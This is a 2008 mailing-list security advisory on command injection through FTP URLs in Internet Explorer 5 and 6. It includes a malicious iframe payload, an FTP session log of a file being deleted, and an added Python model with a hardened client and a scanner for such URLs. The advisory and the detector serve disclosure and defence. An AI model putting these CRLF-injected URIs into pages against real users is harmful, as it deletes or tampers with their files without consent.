
[NT] Microsoft Internet Explorer FTP Command Injection Vulnerability

Date: 12 Mar 2008 11:02:04 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Microsoft Internet Explorer FTP Command Injection Vulnerability
------------------------------------------------------------------------


SUMMARY

Internet Explorer 5 and 6 are vulnerable to a CSRF-like command injection 
attack against the File Transfer Protocol (FTP): a web page can inject 
arbitrary commands into an unsuspecting user's authenticated or 
unauthenticated FTP session. On behalf of the user, an attacker could 
delete, rename or move files, upload malicious files, and possibly steal 
data by having it sent to a server under the attacker's control.

DETAILS

Vulnerable Systems:
 * Internet Explorer 6 (all versions)
 * Internet Explorer 5 (all versions)

Immune Systems:
 * Internet Explorer 7

The flaw is triggered when a user visits a page containing a malicious FTP 
URL. Internet Explorer 5 and 6 percent-decode the supplied URL but do not 
sanitize the result, so FTP commands can be chained together by inserting 
URL-encoded CRLF pairs (%0D%0A) after each command in the URL supplied by 
an HTML element, for example:

<iframe src="ftp://user@site:port/%0D%0ADELE%20foo.txt%0D%0A"></iframe>

Moreover, if two forward slashes are appended to the end of the malicious 
URL, Internet Explorer will attempt to use an already pre-authenticated 
connection established earlier by the user in the same browser session.

If the user has a pre-authenticated connection to an FTP server, an 
attacker who knows the username and endpoint of that connection can 
piggyback on the user's session to execute arbitrary commands. A 
pre-authenticated connection is not required, however: Internet Explorer 
attempts an anonymous login if no username is specified in the URL. If 
only a username is specified and no trailing forward slashes are appended, 
Internet Explorer sends that username with a blank password (which may be 
sufficient for more obscure anonymous accounts). If no username is 
specified, Internet Explorer attempts an anonymous login using 'IEUser@', 
its default anonymous FTP credential.

Successful execution of some attacks may depend on the command tokenizing 
strategy used by the target FTP server and the security configuration on 
the FTP server (for instance, most FTP servers do not allow PORT requests 
for endpoints which do not have the same address as the requesting 
client). In testing, Internet Explorer 6 SP2 required the two trailing 
forward slashes for the exploit to work correctly. Internet Explorer 6 SP1 
did not have this restriction. Internet Explorer 7 is not vulnerable to 
this issue, as it correctly sanitizes the URL before attempting to make 
the request on the FTP server.

Demonstration of the exploit piggybacking on a pre-authenticated 
connection (malicious URL with two trailing forward slashes) with IE6 SP2:

Malicious URI: ftp://admin@10.2.45.237/%0D%0ADELE%20foo.txt%0D%0ACWD//

 --> Welcome banner
 220 debian FTP server (Version wu-2.6.2(2) Tue Mar 20 18:26:53 PST 2007) 
ready.
 
 <-- IE6 Requests a user
 USER admin
 
 --> FTP server requires password
 331 Password required for admin.
 
 <-- IE6 supplies password.
 PASS admin
 
 --> FTP Server responds with successful login.
 230 User admin logged in.
 
 <-- IE6 tests 'OPTS UTF8' option.
 opts utf8 on
 
 --> Server responds with negative permanent reply to OPTS request.
 500 'OPTS utf8 on': command not understood.
 
 <-- IE6 asks for the present working directory.
 PWD
 
 --> Server sends positive completion reply for PWD.
 257 "/home/admin" is current directory.
 
 <-- IE6 requests malicious FTP URI from an iframe in HTML doc
 CWD /home/admin/
 DELE foo.txt
 CWD/
 
 --> Server responds with positive completion for CWD
 250 CWD command successful.
 
 <-- IE6 sends a 'TYPE A' request
 TYPE A
 
 --> Server responds with positive completion for DELE
 250 DELE command successful.
 
 <-- IE6 sends a NOOP.
 noop
 
 --> Server sends negative permanent response for last (invalid) command.
 500 'CWD/': command not understood.

And the file no longer exists.
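The following Python model is an added example, not code from the Rapid7 advisory, from Internet Explorer or from any FTP server. It reproduces the exchange in the transcript above: a vulnerable client that percent-decodes the URL path and splices it into a single CWD, a toy server that tokenizes the control channel on CRLF (or, optionally, on bare LF as well, to show the tokenizing caveat raised earlier), a hardened client that refuses any decoded path containing CR or LF (the behaviour the advisory attributes to IE7), and a scanner that flags ftp:// URLs carrying encoded line terminators in page content. The splicing rule is inferred from the transcript; the server replies, the hardened check, the LF-only variant URI and the HTML snippet are constructed assumptions.

```python
"""Model of the IE5/6 FTP command injection (added example, not IE code)."""
import re
from urllib.parse import unquote, urlsplit

CRLF = "\r\n"

# Constructed inputs: the advisory's URI and a variant that uses bare LF
# (%0A) instead of CRLF, to exercise the server tokenizing caveat.
MALICIOUS_URI = "ftp://admin@10.2.45.237/%0D%0ADELE%20foo.txt%0D%0ACWD//"
LF_ONLY_URI = "ftp://admin@10.2.45.237/%0ADELE%20foo.txt%0ACWD//"


def vulnerable_client_commands(uri: str, cwd: str) -> str:
    """Text a vulnerable client writes to the control channel.

    Assumed behaviour that reproduces the transcript: percent-decode the
    path, drop the trailing "/" of the "//" session-reuse marker, append
    the result to the current directory in one CWD, and never look for
    CR or LF.  The decoded path is "/\r\nDELE foo.txt\r\nCWD//".
    """
    path = unquote(urlsplit(uri).path)
    if path.endswith("//"):
        path = path[:-1]
    return "CWD " + cwd + path + CRLF


def hardened_client_commands(uri: str, cwd: str) -> str:
    """Same construction, but a decoded path holding a line terminator is
    rejected, so one URL can never become more than one FTP command."""
    path = unquote(urlsplit(uri).path)
    if "\r" in path or "\n" in path:
        raise ValueError("CR/LF in decoded FTP path; refusing to build command")
    if path.endswith("//"):
        path = path[:-1]
    return "CWD " + cwd + path + CRLF


def server_tokenize(control_input: str, strict_crlf: bool = True) -> list:
    """Split control-channel input into commands.  RFC 959 ends a command
    at CRLF; some servers also accept a bare LF, which is the tokenizing
    strategy the advisory says attack success may depend on."""
    if strict_crlf:
        lines = control_input.split(CRLF)
    else:
        lines = re.split(r"\r?\n", control_input)
    return [line for line in lines if line]


def server_execute(commands: list, files: set) -> list:
    """Toy server (assumed behaviour) handling CWD and DELE; mutates
    `files` and returns one reply per command, like the transcript."""
    replies = []
    for cmd in commands:
        verb, _, arg = cmd.partition(" ")
        if verb == "CWD" and arg:
            replies.append("250 CWD command successful.")
        elif verb == "DELE" and arg in files:
            files.remove(arg)
            replies.append("250 DELE command successful.")
        else:
            # "CWD/" has no space, so it is an unknown verb, as in the log.
            replies.append(f"500 '{cmd}': command not understood.")
    return replies


def run_session(uri: str, cwd: str = "/home/admin", strict_crlf: bool = True) -> dict:
    """Drive the vulnerable client against the toy server and report what
    the server executed and whether foo.txt survived."""
    files = {"foo.txt"}
    wire = vulnerable_client_commands(uri, cwd)
    commands = server_tokenize(wire, strict_crlf)
    replies = server_execute(commands, files)
    return {"commands": commands, "replies": replies, "files": files}


FTP_URL_RE = re.compile(r"""ftp://[^\s"'<>]+""", re.IGNORECASE)


def find_injected_ftp_urls(content: str) -> list:
    """Scan HTML (or a proxy log line) for ftp:// URLs whose decoded path
    carries CR or LF, the signature of this attack."""
    hits = []
    for url in FTP_URL_RE.findall(content):
        path = unquote(urlsplit(url).path)
        if "\r" in path or "\n" in path:
            hits.append(url)
    return hits


if __name__ == "__main__":
    result = run_session(MALICIOUS_URI)
    for cmd, reply in zip(result["commands"], result["replies"]):
        print(f"<-- {cmd!r}\n--> {reply}")
    print("foo.txt deleted:", "foo.txt" not in result["files"])
```

Running it against the advisory's URI yields the three commands and three replies of the transcript (the file is gone); the LF-only variant deletes the file only when the server tokenizes on bare LF, and the hardened client refuses the URI outright.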

Vendor status and information:
Microsoft was notified of this vulnerability on January 22, 2008. They 
acknowledged the vulnerability on February 7, 2008 and were given 30 days 
to provide fix information.

Solution:
The vendor plans to release a patch for this issue in an upcoming security 
bulletin. If possible, upgrade to Internet Explorer 7.


ADDITIONAL INFORMATION

The information has been provided by Derek Abdine of Rapid7 
(advisory@rapid7.com).
The original article can be found at: 
http://www.rapid7.com/advisories/R7-0032




DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. In no event shall we be liable for any damages whatsoever, including 
direct, indirect, incidental, consequential, loss of business profits or 
special damages. 



